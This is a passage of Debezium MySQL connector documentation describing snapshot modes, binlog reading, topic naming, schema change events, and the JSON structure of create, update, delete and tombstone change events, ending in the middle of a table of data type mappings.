unchanging view of the data in the tables. However, the transaction does not prevent other clients from applying DDL, which could interfere with the connector's attempt to read the binlog position and the table schemas. So, the connector obtains a global read lock in step 2 to prevent such problems, and it keeps this lock for a very short period of time while it reads the binlog position and table schemas in steps 3 and 4. This global read lock is released in step 5, before the connector performs the bulk of the work of copying the data.\n\nIf the connector fails, is rebalanced, or stops before the snapshot is complete, the connector will begin a new snapshot when it is restarted. Once the connector does complete its initial snapshot, the MySQL connector then proceeds to read the binlog from the position read during step 3, ensuring that the connector does not miss any updates. If the connector stops again for any reason, upon restart it will simply continue reading the binlog where it previously left off. However, if the connector remains stopped for long enough, MySQL might purge older binlog files and the connector's last position may be lost. In this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MySQL server will no longer have the starting point and the connector will fail with an error.\n\nA second snapshot mode allows the connector to perform snapshots _whenever necessary_. This behavior is similar to the default _initial_ snapshot behavior mentioned above, except with one exception: if the connector is restarted _and_ MySQL no longer has its starting point in the binlog, rather than failing the connector will instead perform another snapshot. This mode is perhaps the most automated, but at the risk of performing additional snapshots when things go wrong (generally when the connector is down too long).\n\nThe third snapshot mode ensures the connector _never_ performs snapshots. When a new connector is configured this way, it will start reading the binlog from the beginning. This is not the default behavior because starting a new connector in this mode (without a snapshot) requires the MySQL binlog contain the entire history of all monitored databases, and MySQL instances are rarely configured this way. Specifically, the binlog must contain at least the `CREATE TABLE ...` statement for every monitored table. If this requirement is not satisfied, the connector will not be able to properly interpret the structure of the low-level events in the binlog, and it will simply skip all events for those missing table definitions. (The connector cannot rely upon the current definition of those tables, since the tables may have been altered after the initial events were recorded in the binlog, preventing the connector from properly interpreting the binlog events.)\n\nAs of 0.3.4, a fourth snapshot mode allows the connector to start reading the MySQL binlog from its current position when the connector is started. With the `schema_only` mode the connector reads the current binlog position, captures the current table schemas without reading any data, and then proceeds to read the binlog from its current position. This happens very quickly, and the resulting change event streams include only those change events that occurred *after the snapshot started*. This may be useful for consumers that don't need to know the complete state of the database but only need to know the changes that were made since the connector was started.\n\nAs of 0.7.2, a fifth snapshot mode `schema_only_recovery` allows an existing connector to recover a corrupted or lost database history topic. It behaves similarly to `schema_only`, in that it captures the current table schemas without reading any data. The differences are:\n\n* It can only be used on an existing connector, as an update to the connector's configuration.\n* It begins reading the binlog at the last committed offset for this existing connector, rather than the binlog's current position.\n\n`schema_only_recovery` can also be used to periodically \"clean up\" a database history topic (which requires infinite retention) that may be growing unexpectedly. To do this, the database history topic must be manually deleted before updating the connector's snapshot mode to `schema_only_recovery`.\nNote that this mode is safe to use *only* if no schema changes have happened after the committed offset.\nOtherwise, the binlog events between the committed offset and the binlog position with the schema change will be emitted with an inconsistent schema\n(already based on the altered schema, which didn't apply yet for these previous events).\nIt is therefore recommended -- once recovery of the history topic has succeeded -- to return to one of the other snapshotting modes, to prevent further snapshots after subsequent restarts of the connector.\n\nBecause of how the connector records offsets when performing a snapshot, the connector now defaults to `include.schema.events=true`. This writes all DDL changes performed during a snapshot to a topic that can be consumed by apps. And, more importantly, during the final step mentioned above it ensures that the updated offsets are recorded immediately (rather than waiting until a database change occurs).\n\n[[snapshots-without-global-read-locks]]\n==== Snapshots without global read locks\n\nSome MySQL environments, including https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)], do not allow users to obtain global read locks. As of 0.4.0, when the MySQL connector detects that a global read lock is not allowed, it falls back to table-level locks (requiring the database user also has the `LOCK TABLES` privilege) and performs a snapshot using these steps:\n\n1. Start a transaction with https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/innodb-consistent-read.html[_repeatable read_ semantics] to ensure that all subsequent reads within this transaction are done against a single consistent snapshot.\n2. Fail to obtain a global read lock to block writes by other database clients.\n3. Read names of the databases and tables, filtering them using the connector's configuration.\n4. Acquire a table-level lock on all configured tables.\n4. Read the current position of the binlog.\n5. Read the schema of all configured databases and tables.\n6. Optionally write the DDL changes to the _schema change topic_, including all necessary `DROP ...` and `CREATE ...` DDL statements\n7. Scans all of the database tables and generates on the appropriate table-specific Kafka topics `CREATE` events for each row.\n8. Commit the transaction.\n9. Release the table-level locks.\n10. Record in the connector offsets that the connector successfully completed the snapshot.\n\nNote that the _table-level locks are held for nearly all of the consistent snapshot_, including the reading of all database table content in step 7. This is very different than when a global read lock can be used, since that is held for a very short period of time. Unfortunately, this is the only way that the MySQL connector can obtain a consistent snapshot, since https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/lock-tables-and-transactions.html[releasing the table-level locks implicitly commits any open transaction held by the session]. Since we need the transaction to obtain a consistent snapshot of the database content, we are unable to release the table-level locks until after we've read the data in step 7 and committed our transaction in step 8.\n\n\n\n[[reading-the-binlog]]\n=== Reading the MySQL binlog\n\nThe MySQL connector will typically spend the vast majority of its time reading the binlog of the MySQL server to which it is connected.\n\nAs the MySQL connector reads the binlog, it transforms the binary log events into Debezium _create_, _update_, or _delete_ events that include the position in the binlog (including GTIDs if they are used) where the event was found. The MySQL connector forwards these change events to the Kafka Connect framework (running in the same process), which then synchronously writes them to the appropriate Kafka topic. Kafka Connect uses the term _offset_ for the source-specific position information that Debezium includes with each event, and Kafka Connect periodically records the most recent offset in another Kafka topic.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all events to Kafka, and records the last offset received from each connector. Upon restart, Kafka Connect reads the last recorded offset for each connector, and starts the connector from that point. The MySQL connector uses the binlog filename, the position in that file, and the GTIDs (if they are enabled in MySQL server) recorded in its offset to request that MySQL send it the binlog events starting just after that position.\n\n[[topic-names]]\n=== Topics names\n\nThe MySQL connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topics always takes the form _serverName_._databaseName_._tableName_, where _serverName_ is the logical name of the connector as specified with the `database.server.name` configuration property, _databaseName_ is the name of the database where the operation occurred, and _tableName_ is the name of the database table on which the operation occurred.\n\nFor example, consider a MySQL installation with an `inventory` database that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. If the connector monitoring this database were given a logical server name of `fulfillment`, then the connector would produce events on these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\n[[schema-change-topic]]\n=== Schema change topic\n\nIt is often useful for applications to consume events that describe the changes in the database schemas, so the MySQL connector can be configured to produce _schema change events_ with all of the DDL statements applied to databases in the MySQL server. When enabled, the connector writes all such events to a Kafka topic named _serverName_, where _serverName_ is the logical name of the connector as specified with the `database.server.name` configuration property. In our previous example where the logical server name is `fulfillment`, the schema change events would be recorded in the topic `fulfillment`.\n\n[IMPORTANT]\n====\nThe link:#database-schema-history[database history topic] and _schema change topic_ both contain events with the DDL statement. However, we've designed the events on the schema change topic to be easier to consume, so they are more granular and always have the database name. If you're going to consume schema change events, be sure to use the schema change topic and _never_ consume the database history topic.\n====\n\n[NOTE]\n====\nIn order to keep the correct order of schema changes, the schema change topic must not be partitioned.\nThis means a partition count of 1 must be specified when creating this topic.\nWhen relying on auto topic creation, make sure that Kafka's `num.partitions` configuration option (the default number of partitions) is set to 1.\n====\n\nEach message written to the schema change topic will have a message key that contains the name of the database to which the client was connected and using when they applied the DDL statement(s):\n\n[source,json,indent=0]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeKey\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\"\n }\n }\n----\n\nMeanwhile, the schema change event message's value will contain a structure containing the DDL statement(s), the database to which the statements were _applied_, and the position in the binlog where the statement(s) appeared:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeValue\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"ddl\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, description VARCHAR(512), weight FLOAT ); ALTER TABLE products AUTO_INCREMENT = 101;\",\n \"source\" : {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": true,\n \"thread\": null,\n \"db\": null,\n \"table\": null,\n \"query\": null\n }\n }\n }\n----\n\nThe `ddl` field may contain multiple DDL statements, but every statement in the event will apply to the database named in the `databaseName` field and they will appear in the same order as applied to the database. Additionally, all of the events in the schema change topic will appear in the same order as applied to the MySQL server.\n\n[TIP]\n====\nThe `source` field is the exact same structure that appears in normal data change events written to table-specific topics. You can use the contents of this field to correlate the events on different topics.\n====\n\nAs mentioned above, each schema change event will contain one or more DDL statements that apply to a single database. What happens if a client submits a series of DDL statements that apply to _multiple_ databases (e.g., perhaps they use fully-qualified names)? If MySQL applies those statements atomically (e.g., as a single transaction), then the connector will take those DDL statements _in order_, group them by the affected database, and then create a schema change event for each of those groups. On the other hand, if MySQL applies those statements individually, then the connector will create a separate schema change event for each statement.\n\n[[events]]\n=== Events\n\nAll data change events produced by the MySQL connector have a key and a value, although the structure of the key and value depend on the table from which the change events originated (see link:#topic-names[Topic Names]).\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record with the message key and value the http:\/\/kafka.apache.org\/documentation.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nAs of Debezium 0.3, the Debezium MySQL connector ensures that all Kafka Connect _schema names_ are http:\/\/avro.apache.org\/docs\/current\/spec.html#names[valid Avro schema names]. This means that the logical server name must start with Latin letters or an underscore (e.g., [a-z,A-Z,\\_]), and the remaining characters in the logical server name and all characters in the database and table names must be Latin letters, digits, or an underscore (e.g., [a-z,A-Z,0-9,\\_]). If not, then all invalid characters will automatically be replaced with an underscore character.\n\nThis can lead to unexpected conflicts in schemas names when the logical server name, database names, and table names contain other characters, and the only distinguishing characters between table full names are invalid and thus replaced with underscores.\n====\n\nDebezium and Kafka Connect are designed around _continuous streams of event messages_, and the structure of these events may change over time. This could be difficult for consumers to deal with, so to make it very easy Kafka Connect makes each event self-contained. Every message key and value has two parts: a _schema_ and _payload_. The schema describes the structure of the payload, while the payload contains the actual data.\n\n[[change-events-key]]\n==== Change event's key\n\nFor a given table, the change event's key will have a structure that contains a field for each column in the primary key (or unique key constraint) of the table at the time the event was created. Consider an `inventory` database with a `customers` table defined as:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nEvery change event for the `customers` table while it has this definition will feature the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"id\": 1001\n }\n }\n----\n\nThe `schema` portion of the key contains a Kafka Connect schema describing what is in the payload portion, and in our case that means that the `payload` value is not optional, is a structure defined by a schema named `mysql-server-1.inventory.customers.Key`, and has one required field named `id` of type `int32`. If we look at the value of the key's `payload` field, we'll see that it is indeed a structure (which in JSON is just an object) with a single `id` field, whose value is `1004`.\n\nTherefore, we interpret this key as describing the row in the `inventory.customers` table (output from the connector named `mysql-server-1`) whose `id` primary key column had a value of `1004`.\n\n[NOTE]\n====\nAlthough the `column.blacklist` configuration property allows you to remove columns from the event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key will be null. This makes sense since the rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\n[[change-events-value]]\n==== Change event's value\n\nThe value of the change event message is a bit more complicated. Like the key message, it has a _schema_ section and _payload_ section. Starting with Debezium 0.2, the payload section of every change event value produced by the MySQL connector has an _envelope_ structure with the following fields:\n\n* `op` is a mandatory field that contains a string value describing the type of operation. Values for the MySQL connector are `c` for create (or insert), `u` for update, `d` for delete, and `r` for read (in the case of a non-initial snapshot).\n* `before` is an optional field that if present contains the state of the row _before_ the event occurred. The structure will be described by the `mysql-server-1.inventory.customers.Value` Kafka Connect schema, which the `mysql-server-1` connector uses for all rows in the `inventory.customers` table.\n* `after` is an optional field that if present contains the state of the row _after_ the event occurred. The structure is described by the same `mysql-server-1.inventory.customers.Value` Kafka Connect schema used in `before`.\n* `source` is a mandatory field that contains a structure describing the source metadata for the event, which in the case of MySQL contains several fields: the Debezium version, the connector name, the name of the binlog file where the event was recorded, the position in that binlog file where the event appeared, the row within the event (if there is more than one), whether this event was part of a snapshot, name of the affected database and table, id of the MySQL thread creating the event (non-snapshot events only), and if available the MySQL server ID, and the timestamp in seconds. For non-snapshot events, if the MySQL server has the link:#enabling-query-log-events-optional[binlog_rows_query_log_events] option enabled, and the connector is configured with the `include.query` option enabled, the query field will contain the original SQL statement that generated the event.\n* `ts_ms` is optional and if present contains the time (using the system clock in the JVM running the Kafka Connect task) at which the connector processed the event.\n\nAnd of course, the _schema_ portion of the event message's value contains a schema that describes this envelope structure and the nested fields within it.\n\n[[create-events]]\nLet's look at what a _create_ event value might look like for our `customers` table:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\",\n \"version\": 1,\n \"fields\": [\n {\n \"field\": \"op\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"before\",\n \"type\": \"struct\",\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ]\n },\n {\n \"field\": \"after\",\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Value\",\n \"optional\": true,\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ]\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n },\n {\n \"field\": \"ts_ms\",\n \"type\": \"int64\",\n \"optional\": true\n }\n ]\n },\n \"payload\": {\n \"op\": \"c\",\n \"ts_ms\": 1465491411815,\n \"before\": null,\n \"after\": {\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\nIf we look at the `schema` portion of this event's _value_, we can see the schema for the _envelope_, the schema for the `source` structure (which is specific to the MySQL connector and reused across all events), and the table-specific schemas for the `before` and `after` fields.\n\n[TIP]\n====\nThe names of the schemas for the `before` and `after` fields are of the form \"_logicalName_._tableName_.Value\", and thus are entirely independent from all other schemas for all other tables. This means that when using the link:\/docs\/faq\/#avro-converter[Avro Converter], the resulting Avro schemas for _each table_ in each _logical source_ have their own evolution and history.\n====\n\nIf we look at the `payload` portion of this event's _value_, we can see the information in the event, namely that it is describing that the row was created (since `op=c`), and that the `after` field value contains the values of the new inserted row's' `id`, `first_name`, `last_name`, and `email` columns.\n\n[TIP]\n====\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is true, because the JSON representation must include the _schema_ and the _payload_ portions of the message. It is possible and even recommended to use the link:\/docs\/faq\/#avro-converter[Avro Converter] to dramatically decrease the size of the actual messages written to the Kafka topics.\n====\n\n[[update-events]]\nThe value of an _update_ change event on this table will actually have the exact same _schema_, and its payload will be structured the same but will hold different values. Here's an example:\n\nHere's that new event's _value_ formatted to be easier to read:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": {\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": {\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 223344,\n \"ts_sec\": 1465581,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\",\n \"ts_ms\": 1465581029523\n }\n}\n----\n\nWhen we compare this to the value in the _insert_ event, we see a couple of differences in the `payload` section:\n\n* The `op` field value is now `u`, signifying that this row changed because of an update\n* The `before` field now has the state of the row with the values before the database commit\n* The `after` field now has the updated state of the row, and here was can see that the `first_name` value is now `Anne Marie`.\n* The `source` field structure has the same fields as before, but the values are different since this event is from a different position in the binlog.\n* The `ts_ms` shows the timestamp that Debezium processed this event.\n\nThere are several things we can learn by just looking at this `payload` section. We can compare the `before` and `after` structures to determine what actually changed in this row because of the commit. The `source` structure tells us information about MySQL's record of this change (providing traceability), but more importantly this has information we can compare to other events in this and other topics to know whether this event occurred before, after, or as part of the same MySQL commit as other events.\n\n[NOTE]\n====\nWhen the columns for a row's primary\/unique key are updated, the value of the row's key has changed so Debezium will output _three_ events: a `DELETE` event and link:#tombstone-events[tombstone event] with the old key for the row, followed by an `INSERT` event with the new key for the row.\n====\n\n[[delete-events]]\nSo far we've seen samples of _create_ and _update_ events. Now, let's look at the value of a _delete_ event for the same table. Once again, the `schema` portion of the value will be exactly the same as with the _create_ and _update_ events:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": {\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null,\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 223344,\n \"ts_sec\": 1465581,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"snapshot\": false,\n \"thread\": 7,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\",\n \"ts_ms\": 1465581902461\n }\n}\n----\n\nIf we look at the `payload` portion, we see a number of differences compared with the _create_ or _update_ event payloads:\n\n* The `op` field value is now `d`, signifying that this row was deleted\n* The `before` field now has the state of the row that was deleted with the database commit\n* The `after` field is null, signifying that the row no longer exists\n* The `source` field structure has many of the same values as before, except the `ts_sec` and `pos` fields have changed (and the `file` might have changed in other circumstances).\n* The `ts_ms` shows the timestamp that Debezium processed this event.\n\nThis event gives a consumer all kinds of information that it can use to process the removal of this row. We include the old values so that some consumers might require them in order to properly handle the removal, and without it they may have to resort to far more complex behavior.\n\nThe MySQL connector's events are designed to work with https:\/\/cwiki.apache.org\/confluence\/display\/KAFKA\/Log+Compaction[Kafka log compaction], which allows for the removal of some older messages as long as at least the most recent message for every key is kept. This allows Kafka to reclaim storage space while ensuring the topic contains a complete dataset and can be used for reloading key-based state.\n\n[[tombstone-events]]\nWhen a row is deleted, the _delete_ event value listed above still works with log compaction, since Kafka can still remove all earlier messages with that same key. But only if the message value is null will Kafka know that it can remove _all messages_ with that same key. To make this possible, Debezium's MySQL connector always follows _delete_ event with a special _tombstone_ event that has the same key but null value.\n\n[NOTE]\n====\nAs of Kafka 0.10, the JSON converter provided by Kafka Connect never results in a null value for the message (https:\/\/issues.apache.org\/jira\/browse\/KAFKA-3832[KAFKA-3832]). Therefore, Kafka's log compaction will always retain the last message, even when the tombstone event is supplied, though it will be free to remove all prior messages with the same key. In other words, until this is fixed using the JSON Converter will reduce the effectiveness of Kafka's log compaction.\n\nIn the meantime, consider using the link:\/docs\/faq\/#avro-converter[Avro Converter], which does properly return a null value and will thus take full advantage of Kafka log compaction.\n====\n\n[[data-types]]\n=== Data types\n\nAs described above, the MySQL connector represents the changes to rows with events that are structured like the table in which the row exist. The event contains a field for each column value, and how that value is represented in the event depends on the MySQL data type of the column. This section describes this mapping.\n\nThe following table describes how the connector maps each of the MySQL data types to a _literal type_ and _semantic type_ within the events' fields. Here, the _literal type_ describes how the value is literally represented using Kafka Connect schema types, namely `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`. The _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n[cols=\"20%a,15%a,30%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`BOOLEAN`, `BOOL`\n|`BOOLEAN`\n|n\/a\n|\n\n|`BIT(1)`\n|`BOOLEAN`\n|n\/a\n|\n\n|`BIT( > 1)`\n|`BYTES`\n|`io.debezium.data.Bits`\n|The `length` schema parameter contains an integer representing the number of bits. The resulting `byte[]` will contain the bits in little-endian form and will be sized to contain at least the specified number of bits (e.g., `numBytes = n\/8 + (n%8== 0 ? 0 : 1)` where `n` is the number of bits).\n\n|`TINYINT`\n|`INT8`\n|n\/a\n|\n\n|`SMALLINT[(M)]`\n|`INT16`\n|n\/a\n|\n\n|`MEDIUMINT[(M)]`\n|`INT32`\n|n\/a\n|\n\n|`INT`, `INTEGER[(M)]`\n|`INT32`\n|n\/a\n|\n\n|`BIGINT[(M)]`\n|`INT64`\n|n\/a\n|\n\n|`REAL[(M,D)]`\n|`FLOAT32`\n|n\/a\n|\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\n|n\/a\n|\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\n|n\/a\n|\n\n|`CHAR(M)]`\n|`STRING`\n|n\/a\n|\n\n|`VARCHAR(M)]`\n|`STRING`\n|n\/a\n|\n\n|`BINARY(M)]`\n|`BYTES`\n|n\/a\n|\n\n|`VARBINARY(M)]`\n|`BYTES`\n|n\/a\n|\n\n|`TINYBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`TINYTEXT`\n|`STRING`\n|n\/a\n|\n\n|`BLOB`\n|`BYTES`\n|n\/a\n|\n\n|`TEXT`\n|`STRING`\n|n\/a\n|\n\n|`MEDIUMBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`MEDIUMTEXT`\n|`STRING`\n|n\/a\n|\n\n|`LONGBLOB`\n|`BYTES`\n|n\/a\n|\n\n|`LONGTEXT`\n|`STRING`\n|n\/a\n|\n\n|`JSON`\n|`STRING`\n|`io.debezium.data.Json`\n|Contains the string representation of a JSON document, array, or scalar.\n\n|`ENUM`\n|`STRING`\n|`io.debezium.data.Enum`\n|The `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\n|`io.debezium.data.EnumSet`\n|The `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\\|4)]`\n|`INT32`\n|`io.debezium.time.Year`\n|\n\n|`TIMESTAMP[(M)]`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp`\n| Contains an ISO8601 formatted date and time (with up to microsecond precision) in a particular time zone. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision.\n\n|=======================\n\nColumns that store strings are defined in MySQL with a character set and collation, either explicitly on the column's definition or implicitly by inheriting the table's, database's, or server's default character sets and collations. As of 0.3.1, the MySQL connector uses the column's character set when reading the binary representation of the column values in the binlog events.\n\nOther data type mappings are described in the following sections.\n\nIf present, a column's default value will be propagated to the corresponding field's Kafka Connect schema.\nFor `TIMESTAMP` columns who's default value is specified as `CURRENT_TIMESTAMP` or `NOW`, the value _1970-01-01 00:00:00_ will be used as the default value in the Kafka Connect schema.\nChange messages will contain the field's default value\n(unless an explicit column value had been given), so there should rarely be the need to obtain the default value from the schema.\nPassing the default value helps though with satisfying the compatibility rules when link:\/docs\/configuration\/avro\/[using Avro] as serialization format together with the Confluent schema registry.\n\n[[temporal-values]]\n==== Temporal values\n\nOther than MySQL's `TIMESTAMP` data type, the MySQL temporal types depend on the value of the `time.precision.mode` configuration property.\n\n[NOTE]\n====\nAs of Debezium 0.7 `adaptive_time_microseconds` mode was introduced and is the default `time.precision.mode` for the MySQL connector. Mode `adaptive` was marked as deprecated.\n====\n\n[WARNING]\n====\nWhen the `time.precision.mode` is set to `adaptive`, only positive TIME field values in the range of 00:00:00.000000 to 23:59:59.999999 can be captured correctly.\nWhen the `time.precision.mode` is set to `connect` only values in the range of `00:00:00.000` to `23:59:59.999` can be handled.\n\nThe `adaptive` and `connect` time precision modes should only be used if you can make sure that the TIME values in your tables will never exceed the supported ranges. These modes will be removed in a future version of Debezium.\n====\n\nWhen the `time.precision.mode` configuration property is set to `adaptive_time_microseconds` (the default), then the connector will determine the literal type and semantic type for MySQL types `TIME`, `DATE` and `DATETIME` based on the column's data type definition so that events _exactly_ represent the values in the database, all TIME fields will be captured as microseconds:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date`\n| Represents the number of days since epoch.\n\n|`TIME[(M)]`\n|`INT64`\n|`io.debezium.time.MicroTime`\n| Represents the time value in microseconds and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision.\n\n|`DATETIME`, `DATETIME(0)`, `DATETIME(1)`, `DATETIME(2)`, `DATETIME(3)`\n|`INT64`\n|`io.debezium.time.Timestamp`\n| Represents the number of milliseconds past 